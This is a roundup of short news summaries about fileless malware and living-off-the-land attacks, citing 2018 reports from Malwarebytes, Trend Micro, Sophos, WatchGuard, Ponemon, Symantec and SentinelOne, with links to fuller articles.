A completely fileless ransomware, dubbed Sorebrect, is “one of the first of its kind” to combine traditional ransom functionality with fileless tactics, according to a new Malwarebytes report.
In “Under the Radar: The Future of Undetected Malware,” Malwarebytes detailed four fileless attacks observed throughout 2018, including Emotet, TrickBot, SamSam and Sorebrect. The report referenced a study from the Ponemon Institute, which stated that “fileless malware attacks are estimated to account for 35% of all attacks in 2018, and they’re almost 10 times more likely to succeed than file-based attacks.”
Read more about the findings of the Malwarebytes report on TechTarget.
A new worm has been discovered which spreads a modern variant of the remote access tool (RAT) Bladabindi. According to researchers from Trend Micro, the worm spreads Bladabindi — also known as njRAT/Njw0rm — in a fileless form by propagating through removable drives and storage.
In a blog post, the cybersecurity team said Bladabindi has been recompliled, refreshed, and rehashed for years, leading to its presence in countless cyberespionage campaigns. The worm which is now spreading a modern variant of Bladabindi is detected as Worm.Win32.BLADABINDI.AA.
Read more about the new worm that is capable of keylogging, spying, and far more, on ZDNet.
Cyberattackers are successfully evading detection on Windows computers by abusing legitimate admin tools commonly found on the operating system. This is a pivotal finding of the SophosLabs 2019 Threat Report, which traces how the technique has risen from the fringes of the cybercriminal playbook to become a common feature in a growing number of cyber attacks.
Known in security parlance as ‘living off the Land’ or ‘LoL’ because it avoids the need to download dedicated tools, a favourite target is PowerShell, a powerful command line shell that ships by default on all recent Windows computers even though few users have heard of it.
WatchGuard Technologies’ information security predictions for 2019 include the emergence of vaporworms, a new breed of fileless malware with wormlike properties to self-propagate through vulnerable systems, along with a takedown of the internet itself and ransomware targeting utilities and industrial control systems.
“Cyber criminals are continuing to reshape the threat landscape as they update their tactics and escalate their attacks against businesses, governments and even the infrastructure of the internet itself,” said Corey Nachreiner, CTO at WatchGuard Technologies.
According to a study conducted by the Ponemon Institute and sponsored by Barkly, called the “2018 State of Endpoint Security Risk report,” nearly two-thirds of enterprise players have been compromised in the past 12 months by attacks which originated at endpoints, which the organization says is a 20 percent increase year-on-year. Such attacks can prove costly, with the average company enduring a cost of $7.12 million, or $440 per endpoint.
The report shows that zero-day vulnerabilities and fileless attacks are now deemed the most dangerous threats to the enterprise.
Read more about the findings of the new Ponemon study on ZDNet.
Cybercriminals seeking to avoid detection by antimalware defenses have increasingly begun using legitimate hacking tools and tactics — in addition to their own malware — to break into enterprise networks and literally hide in plain sight. Now a new and likely state-sponsored threat group has emerged that isn’t using any custom malware at all.
Instead, the group is exclusively relying on publicly available hacking tools and living-off-the-land tactics to conduct an especially stealthy and hard-to-detect cyber espionage campaign.
Read more about the “Gallmaker” group that is targeting government and military organizations in Europe and the Middle East on DarkReading.
Researchers have uncovered a new attack chain which exploits little-known Microsoft Windows utilities and innocuous software to fly under the radar in the quest to steal data. According to Symantec, the new malware campaign is a prime example of what the company calls “living off the land.”
In other words, attackers are turning to the resources already available on target machines as well as running simple scripts and shellcode in memory and performing fileless attacks. By focusing more on homegrown software and less on introducing foreign malware into target systems, threat actors can remain undetected for longer and minimize the risk of being exposed.
Read more about how attackers are turning to innocuous system processes to compromise Windows machines, on ZDNet.
A snapshot of the threat landscape from the first half of 2018 shows fileless and PowerShell attacks are the ones to worry about this year, security analysts report.
Endpoint security firm SentinelOne today published its “H1 2018 Enterprise Risk Index Report,” which shows fileless-based attacks rose by 94% between January and June. PowerShell attacks spiked from 2.5 attacks per 1,000 endpoints in May 2018 to 5.2 attacks per 1,000 endpoints in June. Ransomware remains popular, ranging from 5.6 to 14.4 attacks per 1,000 endpoints.
Read more about the findings of the SentinelOne report on DarkReading.